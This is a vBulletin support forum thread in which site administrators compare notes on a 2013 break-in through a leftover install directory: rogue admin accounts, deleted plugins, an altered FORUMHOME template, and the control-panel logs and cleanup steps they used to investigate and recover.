A new type hack method?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • runawayjim
    New Member
    • May 2012
    • 2
    • 4.1.x

    #31
    my ajax_start plugin seems to be failing. the code in it looks suspect, but it could be normal.

    there is a file called fuhosin.php in my /forum/ directory that is signed by a hacker. I deleted it. Not sure if a different version of that should be there or not

    Comment

    • ToddG
      New Member
      • Mar 2011
      • 3
      • 4.1.x

      #32
      Originally posted by KryptonSite
      I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

      I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?
      This exact thing happened to our forum today, as well. We've deleted the install directory and his account and are now trying to figure out what, if anything, he may have done to our system.

      Comment

      • DemOnstar
        Senior Member
        • Nov 2012
        • 1912

        #33
        Originally posted by runawayjim
        my ajax_start plugin seems to be failing. the code in it looks suspect, but it could be normal.

        there is a file called fuhosin.php in my /forum/ directory that is signed by a hacker. I deleted it. Not sure if a different version of that should be there or not
        I did a quick search for fuhosin.php and came up with this.


        May not be relevant but there you go...


        Comment

        • kiss of death
          Member
          • May 2008
          • 64
          • 3.7.x

          #34
          Originally posted by ToddG

          This exact thing happened to our forum today, as well. We've deleted the install directory and his account and are now trying to figure out what, if anything, he may have done to our system.
          The person that added themselves to my forum deleted themselves afterwards, go to admincp>Statistics & Logs>controlpanellog>

          Show entres by:
          Blank space at the top (if they deleted themselves)
          or select their name if their still their,

          i got:

          Code:
           [TABLE="class: tborder, align: center"]
           	 		[TR]
           			[TD="class: alt1, align: left"]102106[/TD]
           			[TD="class: alt1"]N/A[/TD]
           			[TD="class: alt1"]18:13, 30th Aug 2013[/TD]
           			[TD="class: alt1"]user.php[/TD]
           			[TD="class: alt1"]kill[/TD]
           			[TD="class: alt1"]user id = 333162[/TD]
           			[TD="class: alt1, align: right"]198.203.28.247[/TD]
           		[/TR]
           		[TR]
           			[TD="class: alt2, align: left"]102105[/TD]
           			[TD="class: alt2"]N/A[/TD]
           			[TD="class: alt2"]18:13, 30th Aug 2013[/TD]
           			[TD="class: alt2"]user.php[/TD]
           			[TD="class: alt2"]remove[/TD]
           			[TD="class: alt2"]user id = 333162[/TD]
           			[TD="class: alt2, align: right"]198.203.28.247[/TD]
           		[/TR]
           		[TR]
           			[TD="class: alt1, align: left"]102104[/TD]
           			[TD="class: alt1"]N/A[/TD]
           			[TD="class: alt1"]18:13, 30th Aug 2013[/TD]
           			[TD="class: alt1"]user.php[/TD]
           			[TD="class: alt1"]edit[/TD]
           			[TD="class: alt1"]user id = 333162[/TD]
           			[TD="class: alt1, align: right"]198.203.28.247[/TD]
           		[/TR]
           		[TR]
           			[TD="class: alt2, align: left"]102103[/TD]
           			[TD="class: alt2"]N/A[/TD]
           			[TD="class: alt2"]18:13, 30th Aug 2013[/TD]
           			[TD="class: alt2"]user.php[/TD]
           			[TD="class: alt2"]find[/TD]
           			[TD="class: alt2"] [/TD]
           			[TD="class: alt2, align: right"]198.203.28.247[/TD]
           		[/TR]
           		[TR]
           			[TD="class: alt1, align: left"]102102[/TD]
           			[TD="class: alt1"]N/A[/TD]
           			[TD="class: alt1"]18:13, 30th Aug 2013[/TD]
           			[TD="class: alt1"]user.php[/TD]
           			[TD="class: alt1"]modify[/TD]
           			[TD="class: alt1"] [/TD]
           			[TD="class: alt1, align: right"]198.203.28.247[/TD]
           		[/TR]
           		[TR]
           			[TD="class: alt2, align: left"]102101[/TD]
           			[TD="class: alt2"]N/A[/TD]
           			[TD="class: alt2"]18:13, 30th Aug 2013[/TD]
           			[TD="class: alt2"]plugin.php[/TD]
           			[TD="class: alt2"] [/TD]
           			[TD="class: alt2"] [/TD]
           			[TD="class: alt2, align: right"]198.203.28.247[/TD]
           		[/TR]
           		[TR]
           			[TD="class: alt1, align: left"]102100[/TD]
           			[TD="class: alt1"]N/A[/TD]
           			[TD="class: alt1"]18:13, 30th Aug 2013[/TD]
           			[TD="class: alt1"]plugin.php[/TD]
           			[TD="class: alt1"]kill[/TD]
           			[TD="class: alt1"]plugin id = 8305[/TD]
           			[TD="class: alt1, align: right"]198.203.28.247[/TD]
           		[/TR]
           		[TR]
           			[TD="class: alt2, align: left"]102099[/TD]
           			[TD="class: alt2"]N/A[/TD]
           			[TD="class: alt2"]18:13, 30th Aug 2013[/TD]
           			[TD="class: alt2"]plugin.php[/TD]
           			[TD="class: alt2"]delete[/TD]
           			[TD="class: alt2"]plugin id = 8305[/TD]
           			[TD="class: alt2, align: right"]198.203.28.247[/TD]
           		[/TR]
           		[TR]
           			[TD="class: alt1, align: left"]102098[/TD]
           			[TD="class: alt1"]N/A[/TD]
           			[TD="class: alt1"]18:13, 30th Aug 2013[/TD]
           			[TD="class: alt1"]plugin.php[/TD]
           			[TD="class: alt1"]modify[/TD]
           			[TD="class: alt1"] [/TD]
           			[TD="class: alt1, align: right"]198.203.28.247[/TD]
           		[/TR]
           		[TR]
           			[TD="class: alt2, align: left"]102097[/TD]
           			[TD="class: alt2"]N/A[/TD]
           			[TD="class: alt2"]18:05, 30th Aug 2013[/TD]
           			[TD="class: alt2"]plugin.php[/TD]
           			[TD="class: alt2"] [/TD]
           			[TD="class: alt2"] [/TD]
           			[TD="class: alt2, align: right"]198.203.28.247[/TD]
           		[/TR]
           		[TR]
           			[TD="class: alt1, align: left"]102096[/TD]
           			[TD="class: alt1"]N/A[/TD]
           			[TD="class: alt1"]18:05, 30th Aug 2013[/TD]
           			[TD="class: alt1"]plugin.php[/TD]
           			[TD="class: alt1"]doimport[/TD]
           			[TD="class: alt1"] [/TD]
           			[TD="class: alt1, align: right"]198.203.28.247[/TD]
           		[/TR]
           		[TR]
           			[TD="class: alt2, align: left"]102095[/TD]
           			[TD="class: alt2"]N/A[/TD]
           			[TD="class: alt2"]18:04, 30th Aug 2013[/TD]
           			[TD="class: alt2"]plugin.php[/TD]
           			[TD="class: alt2"]files[/TD]
           			[TD="class: alt2"] [/TD]
           			[TD="class: alt2, align: right"]198.203.28.247[/TD]
           		[/TR]
           	 [/TABLE]
          From the looks of it they created a plugin, then deleted it then created a user and deleted that, i can't find any modified files on my server and i have don't have the plugins that other people have, the question is why give them selves access and take it away? i've looked through everything and can't find anything out of place

          Comment

          • djsteve007
            New Member
            • Dec 2012
            • 8
            • 3.8.x

            #35
            [QUOTE}

            From the looks of it they created a plugin, then deleted it then created a user and deleted that, i can't find any modified files on my server and i have don't have the plugins that other people have, the question is why give them selves access and take it away? i've looked through everything and can't find anything out of place
            [/QUOTE]

            While I still had my forum running, someone suggest running a admincp thing that checks for unknown or unrecognized files, my system found several (and I have not modded much at all from the original install)

            What I found odd was the sql injections, they tried to inject all kinds of tags and code for various video sites, directly into the sql database, they were not trying to add posts or anything, just doing straight sql injections. Not sure there would be any way to check the sql file and see what has been changed in the last 4 days or not. If not, I am just pulling the forums completely so they can not compromise anything else on my server.

            Comment

            • DemOnstar
              Senior Member
              • Nov 2012
              • 1912

              #36
              Originally posted by kiss of death

              From the looks of it they created a plugin, then deleted it then created a user and deleted that, i can't find any modified files on my server and i have don't have the plugins that other people have, the question is why give them selves access and take it away?
              From that, my assumption is that they came in, stuck something into your database using the plug in thing, erased the plug in thing to try and cover up what it was they did. Don't want to make you paranoid but what if they put something into your database that will or can be triggered by time or some other device. Or maybe I am the one that is paranoid?

              The post above also supports my paranoid theory..


              Comment

              • hurricane_sh
                Senior Member
                • Mar 2005
                • 171

                #37
                This happened to my forum as well. I misread the announcement (I thought 4.1+ didn't include 4.2.0) and didn't remove the install directory.

                I couldn't find any other changes though except the new admin account "Th3H4ck", maybe because I noticed the unusual username in time or password-protected admincp/modcp directory.

                A really scary moment.

                Comment

                • kiss of death
                  Member
                  • May 2008
                  • 64
                  • 3.7.x

                  #38
                  Originally posted by DemOnstar

                  From that, my assumption is that they came in, stuck something into your database using the plug in thing, erased the plug in thing to try and cover up what it was they did. Don't want to make you paranoid but what if they put something into your database that will or can be triggered by time or some other device. Or maybe I am the one that is paranoid?

                  The post above also supports my paranoid theory..
                  I thik your right, i do a daily backup so i can see this happened o the 30th i'l just restore the backup for the 29th to be on the safe side

                  Comment

                  • DemOnstar
                    Senior Member
                    • Nov 2012
                    • 1912

                    #39
                    Originally posted by kiss of death

                    I thik your right, i do a daily backup so i can see this happened o the 30th i'l just restore the backup for the 29th to be on the safe side
                    Best to be on the safe side.
                    After looking up the IP, I see it is in China...http://ip-lookup.net/index.php

                    Oddly enough, that is where I reside...

                    Thanks for your input, this is a learning curve for me too...


                    Comment

                    • DemOnstar
                      Senior Member
                      • Nov 2012
                      • 1912

                      #40
                      Originally posted by hurricane_sh
                      This happened to my forum as well. I misread the announcement (I thought 4.1+ didn't include 4.2.0) and didn't remove the install directory.

                      I couldn't find any other changes though except the new admin account "Th3H4ck", maybe because I noticed the unusual username in time or password-protected admincp/modcp directory.

                      A really scary moment.
                      Have you checked admincp>Statistics & Logs>controlpanellog? As above?


                      Comment

                      • kiss of death
                        Member
                        • May 2008
                        • 64
                        • 3.7.x

                        #41
                        I'm still wondering how they managed to change peoples index pages just from creating an admin account which means the got ftp access or cpanel access which isn't available just for having an admin account?

                        i see the original poster of this thread had vbseo installed, just out of interest, can you go to ADMInCP>SETTINGS>OPTIONS> vBSEO Search Engine XML Sitemap

                        scroll down to "vBSEO Sitemap Interface Access Password" and tell me if the password you used their is the same as your cpanel or ftp account?

                        This is the only way i can currently think of that they might have gained higher access because the password is not encrypted their and any admin can view it and as we've seen before people continue to use the same passwords for everything which is how they get caught out.

                        Comment

                        • DemOnstar
                          Senior Member
                          • Nov 2012
                          • 1912

                          #42
                          Originally posted by kiss of death

                          scroll down to "vBSEO Sitemap Interface Access Password" and tell me if the password you used their is the same as your cpanel or ftp account?
                          You may have something there?
                          Have to wait and see the results.


                          Comment

                          • Reignman
                            New Member
                            • Dec 2011
                            • 25
                            • 4.1.x

                            #43
                            Originally posted by kiss of death
                            I'm still wondering how they managed to change peoples index pages just from creating an admin account which means the got ftp access or cpanel access which isn't available just for having an admin account?

                            i see the original poster of this thread had vbseo installed, just out of interest, can you go to ADMInCP>SETTINGS>OPTIONS> vBSEO Search Engine XML Sitemap

                            scroll down to "vBSEO Sitemap Interface Access Password" and tell me if the password you used their is the same as your cpanel or ftp account?

                            This is the only way i can currently think of that they might have gained higher access because the password is not encrypted their and any admin can view it and as we've seen before people continue to use the same passwords for everything which is how they get caught out.
                            Are you pointing this question to me? If so, I can say that it's not about vbseo. At first, I was suspecting plugins (especially vbseo) too but I am convinced that it is not about plugins.

                            And no, I never use same passwords.

                            You can easily change peoples' index pages via style manager if you have admin account btw.

                            Comment


                            • DemOnstar
                              DemOnstar commented
                              Editing a comment
                              Then I guess that one is ruled out...

                            • Reignman
                              Reignman commented
                              Editing a comment
                              Yes, also if you search in search engines for hacked pages, you can see some of them has vbseo and some of them not.
                          • kiss of death
                            Member
                            • May 2008
                            • 64
                            • 3.7.x

                            #44
                            Originally posted by Reignman
                            You can easily change peoples' index pages via style manager if you have admin account btw.
                            Yeah but a few comments i read said that people had had their index.php and forum.php files switched and they just put the originals back i and everything was fine,

                            Also it wan't vbseo itself i was suspecting, it was the vbseo sitemap generator which people can use without vbseo,, before vb4 vbulletin had no built in sitemap generator and everyone was using the vbseo one because it was free, when vb4 came out a lot of people continued to use itand i do;t beleive their is a problem with it, only the fact that some people use the same passwords and it's clearly shown in a normal field in admincp,

                            yours was obviously done via style manager or it wouldn't still say vbseo at the bottom of the page, i was just curious

                            i'm just really confused as to why someone with that level of access would try and cover their tracks by removing the plugin and user account but not prune the logs?

                            Comment

                            • vb4
                              New Member
                              • Oct 2010
                              • 19

                              #45
                              Originally posted by Reignman
                              I've searched in templates and I saw that he changed "FORUMHOME" script, I reverted it and everything turned back normal.
                              Same happened to me. Deleted "install" folder, found two admin accounts (deleted them), found three plugin entries (deleted them), and also found entries in one of the database tables.

                              That FORUMHOME entry in the database, how do I fix it? Copying vB files via FTP will not help.

                              Thanks

                              P.S.
                              Well, I just saw a REVERT button...

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...